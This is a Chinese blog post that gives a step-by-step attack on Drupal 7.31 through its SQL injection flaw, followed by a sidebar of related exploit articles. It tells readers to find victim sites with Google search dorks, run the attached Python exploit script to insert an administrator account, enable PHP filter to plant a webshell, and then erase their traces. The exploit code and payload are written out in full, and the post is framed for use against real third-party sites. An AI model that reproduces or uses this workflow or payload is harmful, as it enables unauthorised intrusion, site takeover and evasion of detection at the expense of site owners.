Drupal 7.31版本最新漏洞利用个人完整总结,共享出来(附上利用源码)

最新推荐文章于 2024-06-22 09:52:18 发布
最新推荐文章于 2024-06-22 09:52:18 发布
阅读量3.2k 收藏 2
点赞数

 2014年10月16日有国外安全研究人员在Twitter上曝出了Drupal 7.31版本的最新SQL注入漏洞,并给出了利用测试的EXP代码,小编在本地搭建Drupal7.31的环境,经过测试,发现该利用代码可成功执行并在数据库中增加一个攻击者自定义的用户。

       通过测试,我总结了一套完整的利用过程。

      (1)利用google查找潜在的目标,关键字很多啦,比如:inurl:?q=node/等等;

      (2)大概判断一下版本,一般就是查看changelog.txt文件。其实也可以不查看,直接暴力搞,这就稍微没点节操了,哈哈,开个玩笑;

      (3)利用脚本添加登录用户,这个用户是在?q=user/login下登录,进入了Drupal后台;

      以下的步骤就是利用Drupal后台上传webshell了,方法很多啦,这里介绍一种,记得搞完擦痕迹。

     (1)开启PHP filter功能;

     (2)设置php code编辑内容,保证超级管理员可以使用该模式,并且可以解析php代码;

     (3)利用php code模式新增文章就可以啦。

     就这么多了,不多说了,你懂的。。。

    附上利用代码,下面的代码使用Python写的,部分用户可能在运行时出错,这是因为缺少库文件,可以点击打开链接

  

[python]  view plain  copy
  在CODE上查看代码片 派生到我的代码片
  1.  import urllib2,sys  
  2. if len(sys.argv) != 4:  
  3.     print ""  
  4.     print "python 7.xSQL.py  [url]http://xxoo.com/drupal[/url] admin 123456"  
  5.     print ""  
  6.     sys.exit(1)  
  7. host = sys.argv[1]  
  8. user = sys.argv[2]  
  9. password = sys.argv[3]  
  10. hash = DrupalHash("$S$CTo9G7Lx28rzCfpn4WB2hUlknDKv6QTqHaf82WLbhPT2K5TzKzML", password).get_hash()  
  11. target = '%s/?q=node&destination=node' % host  
  12. insert_user = "name[0%20;set+@a%3d%28SELECT+MAX%28uid%29+FROM+users%29%2b1;INSERT+INTO+users+set+uid%3d@a,status%3d1,name%3d\'" \  
  13.             +user \  
  14.             +"'+,+pass+%3d+'" \  
  15.             +hash[:55] \  
  16.             +"';INSERT+INTO+users_roles+set+uid%3d@a,rid%3d3;;#%20%20]=bob&name[0]=larry&pass=lol&form_build_id=&form_id=user_login_block&op=Log+in"  
  17. #print insert_user  
  18. content = urllib2.urlopen(url=target, data=insert_user).read()  
  19. if "mb_strlen() expects parameter 1" in content:  
  20.         print "Success!\nLogin now with user:%s and pass:%s" % (user, password)  

What_Happened
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
drupal 7 ajax,【漏洞分析】CVE-2018-7600 Drupal 7.x 版本代码执行
weixin_35700003的博客
08-06 1278
阅读:8,003CVE-2018-7600影响范围包括了Drupal 6.x,7.x,8.x版本,前几天8.x版本的PoC出来之后大家都赶紧分析了一波,然后热度似乎慢慢退去了。两天前Drupalgeddon2项目更新了7.x版本的exp,实际环境也出现了利用,下面就简单来看一下0x01 概述CVE-2018-7600影响范围包括了Drupal 6.x,7.x,8.x版本,前几天8.x版本的PoC出...
Drupal 7.31最新SQL Injection漏洞利用脚本支撑库文件
10-23
Drupal 7.31最新SQL Injection漏洞利用脚本支撑库文件 具体利用方法可以参见http://blog.csdn.net/kikaylee/article/details/40400643
drupal 执行.php文件,Drupal7.xPHP代码执行漏洞分析
weixin_35928736的博客
04-06 305
0×04 漏洞总结1.重新安装问题需要获得数据库的操作权(不一定是root),方可实现。如获得数据库管理员用户名和密码,且数据库设置为可以对外连接;或者程序某个地方存在注入漏洞。2.文件包含问题,需要有后台管理员权限,方可实现。可以结合其他漏洞,例如本篇文章中提到的重新安装问题。3.这两个问题的危害性和影响范围比较大,drupal在国内外都是比较流行的cms系统,用户很多,如果出现数据库连接...
探秘Drupal 7安全漏洞利用工具:深度剖析与应用实践
最新发布
gitblog_00043的博客
06-22 369
探秘Drupal 7安全漏洞利用工具:深度剖析与应用实践 项目地址:https://gitcode.com/pimps/CVE-2018-7600 在网络安全的暗潮中,漏洞是永远的话题。今天,我们将深入探讨一个专为Drupal 7设计的安全研究工具,该工具针对著名的CVE-2018-7600与CVE-2018-7602漏洞进行了精准打击。对于那些对Web安全充满好奇,或是负责网站维护、安全审计的专...
Drupal漏洞之Drupal 7.31 SQL漏洞
2301_77778745的博客
04-25 569
1.通过python调用drupal7.x.py脚本对数据库进行注入。test test(后面两个test是新设的用户名和密码)2.输入命令:python drupal7.x.py。
detect-exploits:检测Drupal和Wordpress中的常见漏洞利用模式
05-16
一个简单的bash脚本,用于扫描WordPress和Drupal中的漏洞。 依存关系 现代的GNU grep和GNU查找。 安装 make install 用法 detect-exploits [OPTION]... DIR A simple bash script to scan for exploits in ...
商业源码-编程源码-Drupal v6.1.zip
06-15
10. **升级路径**:对于仍在使用Drupal v6.1的企业,强烈建议升级到更现代的版本,如v7或v8,以获取最新的功能、安全性和性能提升。 综上所述,Drupal v6.1是一个功能丰富的CMS,适合构建复杂的商业网站。然而,...
drupal7源码
02-16
Drupal 7 源码分析 Drupal 是一个强大的开源内容管理系统(CMS),广泛用于构建复杂的网站和应用...深入理解 Drupal 7 的源码,不仅可以提升开发者的技术能力,也能更好地利用 Drupal 构建高效、定制化的解决方案。
[Vulnhub]Drupal7.3漏洞复现
qq_69209270的博客
10-07 283
cve-2014-3704主要判断是否有sql漏洞,后面操作全是靠kali中工具网站要学会利用kali中的工具,kali中工具很多,尤其是searchsploit工具,大部分cms漏洞都可以在上面找到。
漏洞复现-Drupal远程代码执行漏洞(CVE-2018-7602)
qq_45751902的博客
10-23 2058
的多个子系统中存在一个远程执行代码漏洞。这可能允许攻击者利用 Drupal 站点上的多个攻击媒介,从而导致该站点受到威胁。此漏洞与 Drupal 核心 - 高度关键 - 远程代码执行 - SA-CORE-2018-002 有关。SA-CORE-2018-002 和此漏洞都在野外被利用。-c 后面接命令,紧随账号,密码。
Drupal远程代码执行漏洞(CVE-2018-7602)
weixin_46411728的博客
08-24 1417
CVE-2018-7602
Drupal 7.31 SQL注入漏洞利用详解及EXP
热门推荐
Exploit的小站~
05-10 2万+
 有意迟几天放出来这篇文章以及程序,不过看样子Drupal的这个洞没有引起多少重视,所以我也没有必要按着不发了,不过说实话这个洞威力挺大的,当然,这也是Drupal本身没有意料到的。 0x00 首先,这个漏洞真的很大,而且Drupal用的也比较多,应该可以扫出很多漏洞主机,但是做批量可能会对对方网站造成很大的损失,所以我也就只是写个Exp。不过,这个洞好像不怎么被重视,这也是极为不合适。...
Drupal < 7.32 “Drupalgeddon” SQL注入漏洞(CVE-2014-3704)漏洞复现
ADummy的博客
02-23 861
Drupal < 7.32 “Drupalgeddon” SQL注入漏洞 by ADummy 0x00利用路线 ​ Burpsuite抓包改包—>信息被爆出 0x01漏洞介绍 ​ Drupal 是一款用量庞大的CMS,其7.0~7.31版本中存在一处无需认证的SQL漏洞。通过该漏洞,攻击者可以执行任意SQL语句,插入、修改管理员信息,甚至执行任意代码。 影响版本 Drupal < 7.31 0x02漏洞复现 payload: POST /?q=node&destinati
Drupal远程代码执行漏洞(CVE-2019-6339)
weixin_46411728的博客
08-25 2610
Drupal 远程代码执行漏洞(CVE-2019-6339)
Drupal漏洞复现:CVE-2019-6341
weixin_59086772的博客
12-30 2206
近期遇到Drupal漏洞,研究了一下,给大家分享一篇复现,望共鸣 前言: Vulhub是一个基于docker和docker-compose的漏洞环境集合,进入对应目录并执行一条语句即可启动一个全新的漏洞环境,让漏洞复现变得更加简单,让安全研究者更加专注于漏洞原理本身。 好哥哥,你等会,你刚才讲的docker我听了个大概,这docker-compose又是啥玩应啊? docker-compose是用python写的一个docker容器管理工具,可以一键启动多个容器、可以一键日卫星。。。。。。假的假的,
ISCC--实战第一阶段(记Drupal漏洞利用)
qq_73767109的博客
05-19 382
或者进入pycharm中(如果是用pycharm的话)在里面搜索beautifulsoup4下载即可。使用最常见的cve-2018-7600漏洞。如果报错可以尝试进入python输入。输入ps -ef查看进程即可。按要求下载VPN连接后。用linux搜索相关漏洞。在网上搜索该漏洞的poc。把地址改成需要利用的地址。
Drupal完整安装教程
"Drupal安装指南,包括在不同操作系统如*nix(Linux, Unix, Mac)和Windows上的安装步骤,以及对服务器环境的要求,如Web服务器(Apache或IIS)、数据库支持(MySQL, PostgreSQL, SQLite等)和PHP版本的需求。...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值